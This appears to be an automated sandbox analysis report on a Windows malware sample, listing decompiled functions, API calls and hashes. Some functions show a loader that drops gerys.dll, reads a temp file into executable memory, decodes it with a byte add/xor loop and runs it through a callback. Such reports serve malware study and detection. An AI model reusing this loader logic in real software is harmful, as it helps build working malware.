Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024aa
0x00401561
0x00402825
0x00402880
0x0040288c

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F

Uniqueness

Uniqueness Score: -1.00%

Function 00404D73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}

0x00404d7f
0x00404da4
0x00404dc4
0x00404dc7
0x00404dca
0x00404de1
0x00404de7
0x00404dee
0x00404df5
0x00404dfc
0x00404e01
0x00404e07
0x00000000
0x00404e17
0x00404db1
0x00404e04
0x00404e04
0x00000000
0x00404e04
0x00404dbd
0x00404dbf
0x00000000
0x00404dbf
0x00404d85
0x00000000
0x00000000
0x00404d8c
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404DA9
CallWindowProcA.USER32 ref: 00404E17

Part of subcall function 00403E83: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403E95

Strings

, xrefs: 00404D81

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004024B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsc48D6.tmp\gerys.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004024b0
0x004024b0
0x004024b3
0x004024ce
0x004024b5
0x004024b7
0x004024bc
0x004024c3
0x004024d5
0x0040264e
0x0040264e
0x004024db
0x004024ed
0x004015a6
0x004015a8
0x00000000
0x004015ae
0x004015a8
0x00402880
0x0040288c

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll,00000000,?,?,00000000,00000011), ref: 004024ED

Strings

C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll, xrefs: 004024BC, 004024E1

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll
API String ID: 427699356-1374204204
Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004055BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004055c0
0x004055ca
0x004055cc
0x004055d3
0x004055db
0x00000000
0x00000000
0x00000000
0x004055db
0x004055dd
0x004055e2

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INQUIRY.exe,C:\Users\user\Desktop\INQUIRY.exe,80000000,00000003), ref: 004055C5
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INQUIRY.exe,C:\Users\user\Desktop\INQUIRY.exe,80000000,00000003), ref: 004055D3

Strings

C:\Users\user\Desktop, xrefs: 004055BF

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9

Uniqueness

Uniqueness Score: -1.00%

Function 004056D1 Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x004056dd
0x004056df
0x00405707
0x004056ec
0x004056f1
0x004056fc
0x00000000
0x00405719
0x00405705
0x00405705
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rstmgknbahw.exePID: 6472, Parent PID: 3424COMMON

Execution Graph

Execution Coverage:	29%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 6FB01070 Relevance: 9.2, APIs: 6, Instructions: 198
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E6FB01070(void* __ebx) {
				long _v8;
				void* _v12;
				long _v16;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				long _v44;
				short _v1084;
				void* _t97;
				void* _t100;
				signed int _t104;
				void* _t106;
				void* _t137;
				_Unknown_base(*)()* _t149;
				long _t187;

				_t137 = __ebx;
				_push(__ebx);
				_v40 = 0x74;
				_v38 = 0x61;
				_v36 = 0x75;
				_v34 = 0x64;
				_v32 = 0x6f;
				_v30 = 0x73;
				_v28 = 0x77;
				_v26 = 0x79;
				_v24 = 0x6f;
				_v22 = 0;
				GetTempPathW(0x103,  &_v1084);
				E6FB01000( &_v1084,  &_v40);
				_t97 = CreateFileW( &_v1084, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_v20 = _t97;
				_v16 = GetFileSize(_v20, 0);
				_t100 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
				_v12 = _t100;
				_t187 = _v16;
				ReadFile(_v20, _v12, _t187,  &_v44, 0); // executed
				_v8 = 0;
				while(_v8 < _v16) {
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) + 0x35;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xac;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000072;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000090;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0x21;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xaf;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000e5;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000cb;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000061;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					_t187 = _v8 + 1;
					_v8 = _t187;
				}
				_t149 = _v12;
				_t104 = EnumResourceTypesA(0, _t149, 0); // executed
				_t106 = (_t104 ^ 0x0000620a) + 0x16054;
				if(_t137 + 0xb33a != 0x12f4f) {
					_t106 = _t106 + 0x17ef8;
					_t187 = _t187 - 1;
					_t149 = _t149 + 1;
				}
				return _t106;
			}

0x6fb01070
0x6fb01079
0x6fb0107f
0x6fb01088
0x6fb01091
0x6fb0109a
0x6fb010a3
0x6fb010ac
0x6fb010b5
0x6fb010be
0x6fb010c7
0x6fb010cd
0x6fb010dd
0x6fb010ee
0x6fb0110f
0x6fb01115
0x6fb01124
0x6fb01134
0x6fb0113a
0x6fb01143
0x6fb0114f
0x6fb01155
0x6fb01167
0x6fb01185
0x6fb0119c
0x6fb011b0
0x6fb011c7
0x6fb011db
0x6fb011ee
0x6fb01201
0x6fb01218
0x6fb0122b
0x6fb01242
0x6fb01255
0x6fb01268
0x6fb0127f
0x6fb01293
0x6fb012a6
0x6fb01161
0x6fb01164
0x6fb01164
0x6fb012af
0x6fb012b5
0x6fb012c0
0x6fb012d1
0x6fb012d3
0x6fb012d8
0x6fb012d9
0x6fb012d9
0x6fb012fb

APIs

GetTempPathW.KERNEL32(00000103,?), ref: 6FB010DD
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FB0110F
GetFileSize.KERNEL32(?,00000000), ref: 6FB0111E
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6FB01134
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 6FB0114F
EnumResourceTypesA.KERNEL32(00000000,?,00000000), ref: 6FB012B5

Memory Dump Source

Source File: 00000003.00000002.705492818.000000006FB01000.00000020.00020000.sdmp, Offset: 6FB00000, based on PE: true

Associated: 00000003.00000002.705476299.000000006FB00000.00000002.00020000.sdmpDownload File
Associated: 00000003.00000002.705537373.000000006FB05000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6fb00000_rstmgknbahw.jbxd

Similarity

API ID: File$AllocCreateEnumPathReadResourceSizeTempTypesVirtual
String ID:
API String ID: 3718768629-0
Opcode ID: e3acfcb4fbd8feea85c32b344638b706da53ada9cf242642384d84454a2c7a55
Instruction ID: c194f60ffb892a93773c8828d363a94d87e43af6a857df35c224e2755621a843
Opcode Fuzzy Hash: e3acfcb4fbd8feea85c32b344638b706da53ada9cf242642384d84454a2c7a55
Instruction Fuzzy Hash: 9E912035904188EFDB05CBA8C991BEDBFB1EF5A308F1840D8D541AB392C6766F54DB24

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rstmgknbahw.exePID: 1904, Parent PID: 6472COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	1.6%
Total number of Nodes:	1529
Total number of Limit Nodes:	11

Executed Functions

Function 00401489 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}

0x0040149f
0x004014a5
0x004014a9
0x004014ec
0x004014ee
0x004014ee
0x004014b7
0x004014bb
0x004014c7
0x004014cd
0x004014d3
0x004014d8
0x004014e0
0x004014e0
0x004014d8
0x004014e6
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD

Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v2.0.50727, xrefs: 00401053

Memory Dump Source

Source File: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v2.0.50727
API String ID: 2372384083-2350909873
Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679

Uniqueness

Uniqueness Score: -1.00%

Function 02553850 Relevance: 2.0, Strings: 1, Instructions: 750
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>_kq, xrefs: 02553F9D

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID: >_kq
API String ID: 0-4149988037
Opcode ID: 9c13271f80586823547e62fd573edc33fa8a4a3cf276c905bc28ab34a418f7f2
Instruction ID: 546408dfc1796058097e382758d689d8546cc293804e59fba92dd2619eef9da9
Opcode Fuzzy Hash: 9c13271f80586823547e62fd573edc33fa8a4a3cf276c905bc28ab34a418f7f2
Instruction Fuzzy Hash: 8F42D371A04226DFCB15CF68C4A49A9BFB2FF85350B1985EAEC099F216C731EC45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1D Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}

0x00401e22
0x00401e28

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22

Memory Dump Source

Source File: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 025523A0 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020279e0d236c5e0a3c0ff34d622bd866ea5607429bcc6496a6637c3d6a0fe2c
Instruction ID: acbeaea2775a0ffa45a81ea8ff9fb7bd0942d2870cc34b62db93ae2336d0a29c
Opcode Fuzzy Hash: 020279e0d236c5e0a3c0ff34d622bd866ea5607429bcc6496a6637c3d6a0fe2c
Instruction Fuzzy Hash: CC12BC70A04225CFDB24CF79D4A86ADBBF2BF88314F14896ADC06DB255DBB49C85CB44

Uniqueness

Uniqueness Score: -1.00%

Function 02552FA8 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ac290053b65ead51e95a76bced9c97b9fba2a5453faa458d7958d6bed135f46
Instruction ID: 74e48b6ef03761b688bf26e0ad6a38988aff48c06f10469681a09a68212d6875
Opcode Fuzzy Hash: 9ac290053b65ead51e95a76bced9c97b9fba2a5453faa458d7958d6bed135f46
Instruction Fuzzy Hash: DC81B032F01525ABD714DBA8D854A6EBBF3AFC4350F2984A5D809EB365DE30DC41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0255306F Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c1f5ee8d24f2582e7ad8a36e78c8772b15847436cfed8c189aee561888275b7
Instruction ID: 7047a41e21df9db97532f85cfc1b215cbcca9693a27c39cf424d0ea83dbf31ec
Opcode Fuzzy Hash: 7c1f5ee8d24f2582e7ad8a36e78c8772b15847436cfed8c189aee561888275b7
Instruction Fuzzy Hash: C0517B32F015259BD714DB69C894B5EB7E3AFC8350F2AC1A5E809EB369DE34DC418B90

Uniqueness

Uniqueness Score: -1.00%

Function 004055C5 Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x004055c5
0x004055cf
0x004055d3
0x004055e4
0x004055e8
0x004055ed
0x004055f3
0x004055f8
0x004055fd
0x00405602
0x00405609
0x004055d5
0x004055d5
0x004055d5
0x00405614

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004055C9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609

Memory Dump Source

Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD

Uniqueness

Uniqueness Score: -1.00%

Function 02552D58 Relevance: 2.6, Strings: 2, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>_kq, xrefs: 02552DA5
, xrefs: 02552E76

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

